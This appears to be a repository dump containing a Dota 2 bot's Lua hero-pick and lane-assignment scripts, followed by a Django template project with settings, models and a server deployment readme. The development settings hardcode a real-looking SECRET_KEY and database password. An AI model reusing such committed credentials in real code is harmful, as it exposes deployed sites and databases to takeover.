{\n\t\"npc_dota_hero_bane\",\n\"npc_dota_hero_crystal_maiden\",\n\"npc_dota_hero_earthshaker\",\n\"npc_dota_hero_pudge\",\n\"npc_dota_hero_sand_king\",\n\"npc_dota_hero_vengefulspirit\",\n\"npc_dota_hero_lich\",\n\"npc_dota_hero_lion\",\n\"npc_dota_hero_shadow_shaman\",\n\"npc_dota_hero_slardar\",\n\"npc_dota_hero_witch_doctor\",\n\"npc_dota_hero_riki\",\n\"npc_dota_hero_warlock\",\n\"npc_dota_hero_dazzle\",\n\"npc_dota_hero_furion\",\n\"npc_dota_hero_night_stalker\",\n\"npc_dota_hero_bounty_hunter\",\n\"npc_dota_hero_jakiro\",\n\"npc_dota_hero_chen\",\n\"npc_dota_hero_ancient_apparition\",\n\"npc_dota_hero_spirit_breaker\",\n\"npc_dota_hero_shadow_demon\",\n\"npc_dota_hero_treant\",\n\"npc_dota_hero_ogre_magi\",\n\"npc_dota_hero_undying\",\n\"npc_dota_hero_rubick\",\n\"npc_dota_hero_disruptor\",\n\"npc_dota_hero_nyx_assassin\",\n\"npc_dota_hero_keeper_of_the_light\",\n\"npc_dota_hero_wisp\",\n\"npc_dota_hero_tusk\",\n\"npc_dota_hero_skywrath_mage\",\n\"npc_dota_hero_elder_titan\",\n\"npc_dota_hero_earth_spirit\",\n\"npc_dota_hero_phoenix\",\n\"npc_dota_hero_oracle\",\n\"npc_dota_hero_techies\",\n\"npc_dota_hero_winter_wyvern\",\n\"npc_dota_hero_dark_willow\",\n}\ncarry_pool = {\n\t\"npc_dota_hero_drow_ranger\",\n\t\"npc_dota_hero_chaos_knight\",\n\t\"npc_dota_hero_juggernaut\",\n\t\"npc_dota_hero_phantom_assassin\",\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_lone_druid\",\n}\nmid_pool = {\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_tinker\",\n\t\"npc_dota_hero_medusa\",\n\t\"npc_dota_hero_huskar\",\n\t\"npc_dota_hero_viper\",\n\t\"npc_dota_hero_death_prophet\",\n\t\"npc_dota_hero_dragon_knight\",\n\t\"npc_dota_hero_sniper\",\n \"npc_dota_hero_templar_assassin\",\n}\noff_pool = {\n\t\"npc_dota_hero_tidehunter\",\n\t\"npc_dota_hero_bristleback\",\n\t\"npc_dota_hero_beastmaster\",\n\t\"npc_dota_hero_omniknight\",\n\t-- \"npc_dota_hero_tiny\",\n\t\"npc_dota_hero_underlord\",\n\t\"npc_dota_hero_abaddon\",\n\t\"npc_dota_hero_legion_commander\",\n}\nsupport_pool = {\n\t\"npc_dota_hero_jakiro\",\n\t\"npc_dota_hero_witch_doctor\",\n\t\"npc_dota_hero_vengefulspirit\",\n\t\"npc_dota_hero_keeper_of_the_light\",\n\t\"npc_dota_hero_bane\",\n\t\"npc_dota_hero_crystal_maiden\",\n\t\"npc_dota_hero_lich\",\n\t\"npc_dota_hero_lion\",\n\t\"npc_dota_hero_techies\",\n\t\"npc_dota_hero_ogre_magi\",\n}\n-- This is the pool of heros from which to choose bots for each position\nhero_pool_position={\n [1] = carry_pool,\n [2] = mid_pool,\n [3] = off_pool,\n [4] = support_pool,\n}\nheroes_positions = {\n\t[1] = carry_heroes,\n\t[2] = mid_heroes,\n\t[3] = off_heroes,\n\t[4] = support_heroes,\n}\nfunction Think()\n\tlocal team = GetTeam()\n\tif(GameTime()<45 and AreHumanPlayersReady(team)==false or GameTime()<25)\n\tthen\n\t\treturn\n\tend\n\n\tlocal picks = GetPicks()\n\tlocal selectedHeroes = {};\n for slot, hero in pairs(picks) do\n selectedHeroes[hero] = true;\n end\n\n\tfor i,id in pairs(GetTeamPlayers(team)) do\n\t\tif(IsPlayerInHeroSelectionControl(id) and IsPlayerBot(id) and (GetSelectedHeroName(id)==\"\" or GetSelectedHeroName(id)==nil))\n\t\tthen\n\t\t\twhile (GameTime()-pickTime)<2 do\n\t\t\t\treturn\n\t\t\tend\n\t\t\tpickTime=GameTime();\n\t\t\t\n\t\t\tlocal temphero = GetPositionedHero(team, selectedHeroes);\n\t\t\tSelectHero(id, temphero);\n\t\tend\n\tend\nend\n\nfunction UpdateLaneAssignments() \n\tlocal gamestate = GetGameState()\n\tif(gamestate==GAME_STATE_HERO_SELECTION or gamestate==GAME_STATE_STRATEGY_TIME or gamestate==GAME_STATE_TEAM_SHOWCASE or gamestate==GAME_STATE_WAIT_FOR_MAP_TO_LOAD or 
gamestate==GAME_STATE_WAIT_FOR_PLAYERS_TO_LOAD)\n\tthen\n\t\treturn;\n\tend\n\n\tlocal lineup = {}\n\tlocal dual_off = false\n\tlocal aggro_tri = false\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id);\n\t\tif (hero == nil) then\n\t\t\tbreak\n\t\tend\n\t\tlocal heroName = hero:GetUnitName();\n\t\t-- print(heroName)\n\t\ttable.insert(lineup,heroName)\n\t\t-- print(#lineup)\n\tend\n\n\t-- print(#lineup)\n\n\t-- Declared here so the role checks below can see the positioned heroes.\n\tlocal carry_hero = nil\n\tlocal mid_hero = nil\n\tlocal off_hero = nil\n\tlocal support_heroes = {}\n\tfor _, hero in ipairs(lineup) do\n\t\tif GetHeroPosition(hero) == 1 then\n\t\t\tcarry_hero = hero\n\t\telseif GetHeroPosition(hero) == 2 then\n\t\t\tmid_hero = hero\n\t\telseif GetHeroPosition(hero) == 3 then\n\t\t\toff_hero = hero\n\t\telse\n\t\t\ttable.insert(support_heroes, hero)\n\t\tend\n\tend\n\n\t-- dual off check --\n\tif ListContains(lineup, \"npc_dota_hero_keeper_of_the_light\") then\n\t\tif (\n\t\t\tListContains(lineup, \"npc_dota_hero_beastmaster\") or \n\t\t\tListContains(lineup, \"npc_dota_hero_bristleback\") or\n\t\t\tListContains(lineup, \"npc_dota_hero_omniknight\") or\n\t\t\tListContains(lineup, \"npc_dota_hero_tiny\")\n\t\t) then\n\t\t\tdual_off = true\n\t\tend\n\tend\n\n\t-- aggro tri check --\n\tif (\n\t\tcarry_hero == \"npc_dota_hero_chaos_knight\" or\n\t\tcarry_hero == \"npc_dota_hero_phantom_assassin\" or\n\t\tcarry_hero == \"npc_dota_hero_juggernaut\"\n\t) then\n\t\taggro_tri = true\n\tend\n\n\tlocal laneTable = GetLanesTable(dual_off, aggro_tri)\n\t-- print(laneTable)\n\tlocal lanes = {1,2,3,1,1}\n\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id)\n\t\tif (hero == nil) then\n\t\t\tbreak\n\t\tend\n\t\tlocal hero_name = hero:GetUnitName()\n\t\tlocal position = GetHeroPosition(hero_name)\n\t\tif position == 4 and dual_off and hero_name ~= \"npc_dota_hero_keeper_of_the_light\" then\n\t\t\tposition = position + 1\n\t\tend\n\t\tlanes[id] = laneTable[position]\n\t\t-- print(\"id\", id, \"position\", position, laneTable[position])\n\tend\n\n\tif(DotaTime()<-15)\n\tthen\n\t\t-- print(DotaTime())\n\t\treturn lanes\n\tend\n\n\tlocal safeLane = GetSafeLane()\n\tlocal offLane = GetOffLane()\n\n\t-- One shared lane budget, filled per composition and consumed below.\n\tlocal lanecount\n\tif dual_off then\n\t\tlanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 2,\n\t\t\t[safeLane] = 2,\n\t\t};\n\telseif aggro_tri then\n\t\tlanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 2,\n\t\t\t[safeLane] = 2,\n\t\t};\n\telse\n\t\tlanecount = {\n\t\t\t[LANE_NONE] = 5,\n\t\t\t[LANE_MID] = 1,\n\t\t\t[offLane] = 1,\n\t\t\t[safeLane] = 3,\n\t\t};\n\tend\n\t\t\n\t--adjust the lane assignment when a player occupies the other lane.\n\t--TODO: Assign lane at Team level not hero level.\n    local playercount = 0\n\tlocal ids = GetTeamPlayers(GetTeam())\n\tfor i,v in pairs(ids) do\n\t\tif not IsPlayerBot(v) then\n\t\t\tplayercount = playercount + 1\n\t\tend\n\tend\n\tif(playercount>0)\n\tthen\n\t\tfor i=1,playercount do\n\t\t\tlocal lane = GetLane( GetTeam(),GetTeamMember( i ) )\n\t\t\tlanecount[lane] = lanecount[lane] - 1\n\t\t\tlanes[i] = lane \n\t\tend\n\t\t\n\t\tfor i=(playercount + 1), 5 do\n\t\t\tlocal hero = GetTeamMember(i);\n\t\t\tlocal heroName = hero:GetUnitName();\n\t\t\tlocal position = GetHeroPosition(heroName);\n\t\t\tlocal bestLane = laneTable[position];\n\t\t\t--try to assign the most suitable lane, if can't try other lane.\n\t\t\tif bestLane ~= nil and lanecount[bestLane] > 0 then\n\t\t\t\tlanes[i] = bestLane\n\t\t\t\tlanecount[bestLane] = lanecount[bestLane] - 1\n\t\t\telseif 
lanecount[offLane] > 0 then\n\t\t\t\tlanes[i] = offLane\n\t\t\t\tlanecount[offLane] = lanecount[offLane] - 1\n\t\t\telseif lanecount[safeLane] > 0 then\n\t\t\t\tlanes[i] = safeLane\n\t\t\t\tlanecount[safeLane] = lanecount[safeLane] - 1\n\t\t\telseif lanecount[LANE_MID] > 0 then\n\t\t\t\tlanes[i] = LANE_MID\n\t\t\t\tlanecount[LANE_MID] = lanecount[LANE_MID] - 1\n\t\t\tend\n\t\tend\n\tend\n return lanes\n\nend\n\n--index:id,value:lane Get normal lane assaignment.\nfunction GetAssaignedLanes()\n\n\tlocal laneTable = GetLanesTable();\n\tlocal lanes = {1,1,2,3,3};\n\n\tfor id=1,5 do\n\t\tlocal hero = GetTeamMember(id);\n\t\tif(hero == nil)\n\t\tthen\n\t\t\tbreak;\n\t\tend\n\t\tlocal heroName = hero:GetUnitName();\n\t\tlocal position = GetHeroPosition(heroName);\n\t\tlanes[id] = laneTable[position];\n\tend\n\treturn lanes;\nend\n\nfunction GetPicks()\n\tlocal selectedHeroes = {}\n\tfor i=0,20 do\n\t\tif (IsTeamPlayer(i)==true) then\n\t\t\tlocal hName = GetSelectedHeroName(i)\n\t\t\tif (hName ~= \"\") then\n\t\t\t\ttable.insert(selectedHeroes,hName)\n\t\t\tend\n\t\tend\n end\n return selectedHeroes;\nend\n\n-- Returns a Hero that fills a position that current team does not have filled.\nfunction GetPositionedHero(team, selectedHeroes)\n\t--Fill positions in random order\n local positionCounts = GetPositionCounts( team );\n\tlocal position\n\tlocal continue = true\n\twhile continue do\n\t\t-- print(\"start looping\")\n\t\tposition=RandomInt(1,4)\n\t\tif positionCounts[position] == 0 or (position == 4 and positionCounts[position] == 1) then\n\t\t\tcontinue = false\n\t\tend\n\tend\n\t-- print(\"End looping\", position)\n\n\treturn GetRandomHero( hero_pool_position[position], selectedHeroes );\nend\n\n-- Returns a random hero from the supplied heroPool that is not in the selectedHeroes list.\n-- Note: this function will enter an infinite loop if all heros in the pool have been selected.\nfunction GetRandomHero(heroPool, selectedHeroes)\n\tlocal hero;\n\trepeat\n\t\thero = heroPool[RandomInt(1, #heroPool)]\n\tuntil( selectedHeroes[hero] ~= true )\n return hero\nend\n\n-- For the given team, returns a table that gives the counts of heros in each position.\nfunction GetPositionCounts( team )\n local counts = { [1]=0, [2]=0, [3]=0, [4]=0 };\n local playerIds=GetTeamPlayers(team);\n\n for i,id in ipairs(playerIds) do\n\t\tlocal heroName = GetSelectedHeroName(id)\n\t\t-- print(heroName)\n if (heroName ~=\"\") then\n for position=1,4,1 do\n if ListContains( hero_pool_position[position], heroName ) then\n counts[position] = counts[position] + 1;\n end\n end\n end\n end\n\n return counts\nend\n\n-- A utilitiy function that returns true if the passed list contains the passed value.\nfunction ListContains( list, value )\n if list == nil then return false end\n for i,v in ipairs(list) do\n if v == value then\n return true\n end\n end\n return false\nend\n\n-- Returns true if, for the specified team, all the Human players have picked a hero.\nfunction AreHumanPlayersReady(team)\n\tlocal number,playernumber=0,0\n\tlocal IDs=GetTeamPlayers(team);\n\tfor i,id in pairs(IDs)\n\tdo\n if(IsPlayerBot(id)==false)\n\t\tthen\n\t\t\tlocal hName = GetSelectedHeroName(id)\n\t\t\tplayernumber=playernumber+1\n\t\t\tif (hName ~=\"\")\n\t\t\tthen\n\t\t\t\tnumber=number+1\n\t\t\tend\n\t\tend\n end\n\t\n\tif(number>=playernumber)\n\tthen\n\t\treturn true\n\telse\n\t\treturn false\n\tend\n\t\nend\n\nfunction GetSafeLane()\n\tif GetTeam() == TEAM_RADIANT\n\tthen\n\t\treturn LANE_BOT;\n\telse\n\t\treturn 
LANE_TOP;\n\tend\nend\n\nfunction GetOffLane()\n\tif GetTeam() == TEAM_RADIANT\n\tthen\n\t\treturn LANE_TOP;\n\telse\n\t\treturn LANE_BOT;\n\tend\nend\n\n-- Return hero's position\nfunction GetHeroPosition( heroName )\n\tif (heroName ~=\"\") then\n\t\tfor p=1,4,1 do\n\t\t\tif( ListContains( heroes_positions[p], heroName )) then\n\t\t\t\treturn p;\n\t\t\tend\n\t\tend\n\tend\n\treturn -1;\nend\n\n--index:position,value:lane.\nfunction GetLanesTable(dual_off, aggro_tri)\n\tlocal safeLane=GetSafeLane();\n\tlocal offLane=GetOffLane();\n\n\tif dual_off then\n\t\tlocal laneTable ={\n\t\t\t[1] = safeLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = offLane,\n\t\t\t[4] = offLane,\n\t\t\t[5] = safeLane\n\t\t}\n\t\treturn laneTable;\n\telseif aggro_tri then\n\t\tlocal laneTable ={\n\t\t\t[1] = offLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = safeLane,\n\t\t\t[4] = offLane,\n\t\t\t[5] = offLane\n\t\t}\n\t\treturn laneTable;\n\telse\n\t\tlocal laneTable ={\n\t\t\t[1] = safeLane,\n\t\t\t[2] = LANE_MID,\n\t\t\t[3] = offLane,\n\t\t\t[4] = safeLane,\n\t\t\t[5] = safeLane\n\t\t}\n\t\treturn laneTable;\n\tend\nend"
},
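The hero selection file above warns that GetRandomHero loops forever once every hero in a pool has been taken. A bounded variant (our sketch, not part of the repo) degrades to nil instead, leaving the caller to fall back to a different pool:

```lua
-- Like GetRandomHero above, but gives up after maxTries draws instead of
-- spinning forever on an exhausted pool.
function GetRandomHeroBounded(heroPool, selectedHeroes, maxTries)
    for _ = 1, (maxTries or 100) do
        local hero = heroPool[RandomInt(1, #heroPool)]
        if selectedHeroes[hero] ~= true then
            return hero
        end
    end
    return nil -- pool exhausted; caller must pick from a different pool
end
```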
{
"alpha_fraction": 0.753333330154419,
"alphanum_fraction": 0.753333330154419,
"avg_line_length": 28.799999237060547,
"blob_id": "f0e3e18976ac6d13c07b0ab25f123e6928dd56f1",
"content_id": "f16c1e200e3efa63d612b7f8a8782c7cdd6d6c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/bot_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\n"
},
{
"alpha_fraction": 0.6766917109489441,
"alphanum_fraction": 0.6879699230194092,
"avg_line_length": 16.799999237060547,
"blob_id": "9ddd15e97ed8cea64858b37b6a34a9820a5b2f18",
"content_id": "84064ef65bfac7886a31609386611e234ca4d22a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 15,
"path": "/ItemBuildUtility.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local X = {}\n\nfunction X.FillTalenTable(npcBot)\n\tlocal skills = {};\n\tfor i = 0, 23 \n\tdo\n\t\tlocal ability = npcBot:GetAbilityInSlot(i);\n\t\tif ability ~= nil and ability:IsTalent() then\n\t\t\ttable.insert(skills, ability:GetName());\n\t\tend\n\tend\n\treturn skills\nend\n\nreturn X;"
}
] | 56 |
PHPirates/django-template
|
https://github.com/PHPirates/django-template
|
e60f296e07477d1b28bb4fbd8f86dc6a6327e6e5
|
5ce6f17b02d6b3ecd0e1b134b36b7ca4343cee20
|
11633546ba2f80648ce336f384c09a279ecb4720
|
refs/heads/master
| 2021-07-06T14:19:46.441490 | 2021-04-08T18:22:12 | 2021-04-09T07:05:13 | 100,186,927 | 2 | 2 |
MIT
| 2017-08-13T15:42:29 | 2021-06-10T17:24:45 | 2021-06-10T17:23:21 |
Python
|
[
{
"alpha_fraction": 0.6944065690040588,
"alphanum_fraction": 0.6944065690040588,
"avg_line_length": 33.904762268066406,
"blob_id": "1522d3592fc4238e23fdf44d056eccd361b1bd43",
"content_id": "382672c7b7f676a1c2061f238e86151c88c8ad68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 733,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 21,
"path": "/pages/views.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file contains the views, the 'pages' of the website. \"\"\"\nfrom django.utils import timezone\nfrom django.views import generic\n\nfrom .models import Article\n\n\n# class IndexView(generic.TemplateView):\nclass IndexView(generic.ListView):\n \"\"\"\" Index of all pages, i.e. home page. \"\"\"\n template_name = 'pages/index.html'\n # Provide name of the context variable returned by get_queryset?\n context_object_name = 'article_list'\n\n def get_queryset(self) -> None:\n \"\"\"\" Find the home article and display it. \"\"\"\n return Article.objects.filter(published_date__lt=timezone.now()).order_by('published_date')\n\n# Without a class:\n# def index(request):\n# return render(request, 'pages/index.html', context={})\n"
},
{
"alpha_fraction": 0.6611253023147583,
"alphanum_fraction": 0.6649616360664368,
"avg_line_length": 33,
"blob_id": "99ddd3ae4c4adad5ace101023deec7751bcd86d6",
"content_id": "45fa49dfa338b500ff3fd5c4180b768c353a2f2b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 23,
"path": "/pages/models.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" Models are objects used in the website. \"\"\"\nfrom django.db import models\nfrom django.utils import timezone\nfrom tinymce.models import HTMLField\n\n\nclass Article(models.Model):\n \"\"\"\" This model is an article. \"\"\"\n author = models.ForeignKey('auth.User', on_delete=models.PROTECT)\n title = models.CharField(max_length=200)\n # An HTMLField will use the TinyMCE editor, a TextField won't\n text = HTMLField()\n created_date = models.DateTimeField(default=timezone.now)\n published_date = models.DateTimeField(blank=True, null=True)\n\n def publish(self) -> None:\n \"\"\"\" Publish article now. \"\"\"\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self) -> str:\n \"\"\" Python to-string method. \"\"\"\n return self.title\n"
},
{
"alpha_fraction": 0.6558441519737244,
"alphanum_fraction": 0.6558441519737244,
"avg_line_length": 21,
"blob_id": "371bfc499d74ff3ce8282b61d18834fceee028c6",
"content_id": "ddf4a85d16651173e5cecae5af1d1cdea3c48b47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 7,
"path": "/pages/apps.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file is here to register apps. \"\"\"\nfrom django.apps import AppConfig\n\n\nclass HomeConfig(AppConfig):\n \"\"\" Register app. \"\"\"\n name = 'pages'\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6532738208770752,
"avg_line_length": 23,
"blob_id": "807c081836619ba3dcd974e8ce5819f07bc117f2",
"content_id": "228d7b8cf34fd6568644c0b4194eb7cb0696fbf4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 28,
"path": "/mysite/settings/production.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSECURITY WARNING Keep these settings secret, they are for production.\n\"\"\"\n\nfrom mysite.settings.base import *\n\nSECRET_KEY = 'mykey'\n\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n\nDEBUG = False\n\n# Settings for database on deployment server\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django_template_db',\n 'USER': 'django_template',\n 'PASSWORD': 'databasepassword',\n 'HOST': 'server ip address',\n 'PORT': '5432',\n }\n}\n\n# Settings for serving with https\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')\n"
},
{
"alpha_fraction": 0.49504950642585754,
"alphanum_fraction": 0.7029703259468079,
"avg_line_length": 16,
"blob_id": "6f9d3bfa9c3670e519204d97154cda072dc8c93e",
"content_id": "4fe84c35881128f29903d637354c71aaad994126",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 101,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "Django==3.1.8\nmysqlclient==1.4.6\nwheel==0.33.6\ngunicorn==20.0.4\npsycopg2==2.8.4\ndjango-tinymce==2.8.0"
},
{
"alpha_fraction": 0.6052173972129822,
"alphanum_fraction": 0.6278260946273804,
"avg_line_length": 25.136363983154297,
"blob_id": "e1b3c65d7ccbf6d4511b4cdbb22b7d7f5ba9f070",
"content_id": "6444f12f64a2a09d9755487236ba13687b022def",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 22,
"path": "/mysite/settings/development.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" Settings for development purposes. \"\"\"\nfrom mysite.settings.base import *\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '(mk5n7s)#kozir!hh7crys^qj%b-gs@nt@9rk*@x!8dg8j9o=='\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'django_template_db',\n 'USER': 'django_template',\n 'PASSWORD': 'IcoXGoOqJ',\n 'HOST': '127.0.0.1',\n 'PORT': '5432',\n }\n}\n"
},
{
"alpha_fraction": 0.7446845173835754,
"alphanum_fraction": 0.7577083706855774,
"avg_line_length": 100.22491455078125,
"blob_id": "3662afd92f11a9936073d68de4a838637391e698",
"content_id": "055c8890d1a407fc156bfc023b1f4e94ebe90df4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 29254,
"license_type": "permissive",
"max_line_length": 808,
"num_lines": 289,
"path": "/readme.md",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "[](https://scrutinizer-ci.com/g/PHPirates/django-template/build-status/master)\n[](https://scrutinizer-ci.com/g/PHPirates/django-template/?branch=master)\n[](https://www.codacy.com/app/PHPirates/django-template?utm_source=github.com&utm_medium=referral&utm_content=PHPirates/django-template&utm_campaign=Badge_Grade)\n[](https://codeclimate.com/github/PHPirates/django-template/maintainability)\n\n# Django template project and deployment tutorial\n\n### Makes use of\n\n#### For the website:\n* PostgreSQL\n* The [TinyMCE](https://www.tinymce.com/) editor\n* HTML templates\n* CSS\n* Directory structure from [docs.djangoproject.com](https://docs.djangoproject.com/en/1.11/intro/tutorial01/).\n\n#### For deployment:\n* A PostgreSQL database\n* gunicorn to serve the website\n* nginx to 'reverse proxy' requests from outside to gunicorn\n* PyCharm for local and remote development\n* supervisor to manage gunicorn\n\nThis guide has been tested a lot of times on Ubuntu 16.04, 18.04, Raspbian Buster and even Arch Linux.\n\n## Table of Contents\n- [Instructions to run the website locally](#instructions-to-run-the-website-locally)\n * [Setting up postgres locally](#setting-up-postgres-locally)\n- [Deploying on an Ubuntu server](#deploying-on-an-ubuntu-server)\n * [Buy the necessary services](#buy-the-necessary-services)\n * [Setting up users and login](#setting-up-users-and-login)\n * [Firewall and fail2ban](#firewall-and-fail2ban)\n * [Local setup](#local-setup)\n * [Setting up postgres](#postgres)\n * [Setting up a virtual environment](#setting-up-a-virtual-environment)\n * [Uploading project](#uploading-project)\n * [Installing dependencies](#installing-dependencies)\n * [Setting up gunicorn](#setting-up-gunicorn)\n * [Setting up supervisor](#setting-up-supervisor)\n * [Setting up nginx](#setting-up-nginx)\n * [Setting up HTTPS](#setting-up-https)\n * [Start nginx](#start-nginx)\n + [Setting up automatic renewal of https certificates](#setting-up-automatic-renewal-of-https-certificates)\n * [<a name=\"remember\">To remember</a>](#-a-name--remember--to-remember--a-)\n + [Django files](#django-files)\n + [Django models](#django-models)\n + [Static files](#static-files)\n + [Supervisor config](#supervisor-config)\n + [gunicorn start script](#gunicorn-start-script)\n + [nginx config](#nginx-config)\n + [logs](#logs)\n\n\n# Instructions to run the website locally\n\n1. Create a project either by creating a new Django project in PyCharm and then copying the files from this project or by downloading this template project directly.\n1. Probably you want to use a virtual environment.\n1. Check that the packages in requirements.txt are installed, on Windows you may need to download the `mysqlclient` package from [lfd.uci.edu](http://www.lfd.uci.edu/~gohlke/pythonlibs/#mysql-python) selecting the right bits version for you python (you can check that by starting ``python``), copy it to the project location, check there with `pip -V` that you are using the pip of the virtual environment and then run `pip install mysqlclient-1.3.13-cp37-cp37m-win32.whl`. On Linux you can download a `mysqlclient` package from your distro's package repo, you also need `gcc`.\n1. If you use PyCharm, you can make a Django Server run configuration (instead of running `runserver` all the time). Add an environment variable with name `DJANGO_SETTINGS_MODULE` and value `mysite.settings.development`, assuming the settings are in `development.py` in a folder `settings` in the folder `mysite`. 
The development settings are for development on your local computer; production settings are for production on the server.\n1. Tip: If you try running with `DEBUG=False` on your local computer, Django won't serve your static files for you since this is only meant for production.\n1. Possibly you need to select your Python interpreter.\n\n#### Setting up postgres locally\n1. To use a database locally, do the following. On Linux you can skip pgAdmin and do everything via the command line: just continue to set up postgres like below and then go to the instructions linked there.\n    1. Install PostgreSQL (go to the website on Windows, use your package manager on Linux) \n    1. Install pgAdmin (these instructions were tested on Windows with pgAdmin 4 2.0 and on Arch Linux with pgAdmin 4 4.1) or use the command prompt PostgreSQL tools for the next steps\n    1. On Windows:\n        1. To create a user, right-click on PostgreSQL and choose create Login/Group Role, give it for example the name of your project.\n        1. Create a database by right-clicking on Databases, give it a name for example myproject_db, and under the 'security' tab grant all privileges to the user you just created.\n    1. On Linux (tested on Arch Linux, on other distros commands may differ)\n        1. Switch to the postgres user with `sudo su postgres`\n        1. Initialize postgres with `initdb --locale en_US.UTF-8 -D '/var/lib/postgres/data'`\n        1. Switch back to your own user (or open a new terminal window)\n        1. Start the postgresql service with `sudo systemctl start postgresql` and `sudo systemctl enable postgresql`\n        1. Change to a directory which `psql` can access, like `cd /tmp`\n        1. Either use pgAdmin, or reuse the way of working from the server: do the first part of the [postgres section](#postgres) below (until you exit psql) now. If you use pgAdmin:\n    1. Create a server with a name like `mysite_server` and host name `127.0.0.1` and user postgres, empty password.\n    1. Right click on Login/Group Roles and Create a Role, name it something like `mysite_user` and under Privileges give it the login privilege.\n        1. If you get the error `'psycopg2.extensions.Column' object has no attribute '_asdict'` then you have a version mismatch between psycopg2 and pgAdmin, probably psycopg2 is newer than your pgAdmin version (e.g. pgAdmin4 4.4 and psycopg2 2.8.2 will not work). Try updating everything (for newer pgAdmin version you can search online) and if it doesn't help use the command line (link above) to continue.\n    1. Create a database by right-clicking on Databases, give it a name for example myproject_db, select as owner mysite_user and under the 'security' tab add a privilege with grantee mysite_user, grant all privileges to the user you just created.\n    1. Replace name, user and password in `DATABASES` in your settings file.\n\n1. Use Edit | Find | Replace in Path to replace all references to 'mysite' with your own project name. Also rename the 'mysite' module (take care to be consistent with capitalization).\n1. (Professional edition of PyCharm only) To run `manage.py` tasks, go to settings | Languages and Frameworks | Django and specify your settings file (in this case development, which includes base). Then you can use Tools | Run manage.py Task (`CTRL` + `ALT` + `R`) to run tasks like `migrate`.\n1. Each time after you make changes in your models in models.py, run `makemigrations` and `migrate` to apply the changes to the database. Do that now.\n1. 
Also as `manage.py` task, run `createsuperuser --username myname` to create a superuser (for example you) for your website backend.\n1. Use the run configuration you made or run `runserver`.\n1. Access the backend by navigating to [http://127.0.0.1:8000/admin](http://127.0.0.1:8000/admin)\n\n(tip) If you already have a local website running, changing the port number allows you to keep things separate.\n\n# Deploying on an Ubuntu server\nThere are a lot of tutorials around, but I have noticed that instructions get obsolete very quickly, so preferably select the latest one you can find which uses exactly all the tools you want. For me that was the one I had to write myself, as below.\n\nWe will use a **postgres** database, **gunicorn** to serve the website, and **nginx** to 'reverse proxy' requests from outside to gunicorn.\nIt makes life easier if you also use **PyCharm**, and **supervisor** to manage gunicorn.\n\n## Buy the necessary services\n\n1. You will want to buy a VPS, which is a (virtual) server on which you can install whatever you want. Make sure not to buy something called 'shared hosting' as it probably means you can only upload static files. At the moment a VPS can be as cheap as five euros a month.\n1. If, when buying a VPS, you can choose between a pre-installed or ISO-VPS, choose the ISO-VPS, i.e. choose the option with the most freedom (avoid 'time-saving' options).\n1. For this tutorial we will assume you have chosen the latest Ubuntu version; this tutorial is tested with Ubuntu 16.04 and 18.04.\n1. If you don't have a domain yet, you can probably buy it via the same company as you bought the VPS. 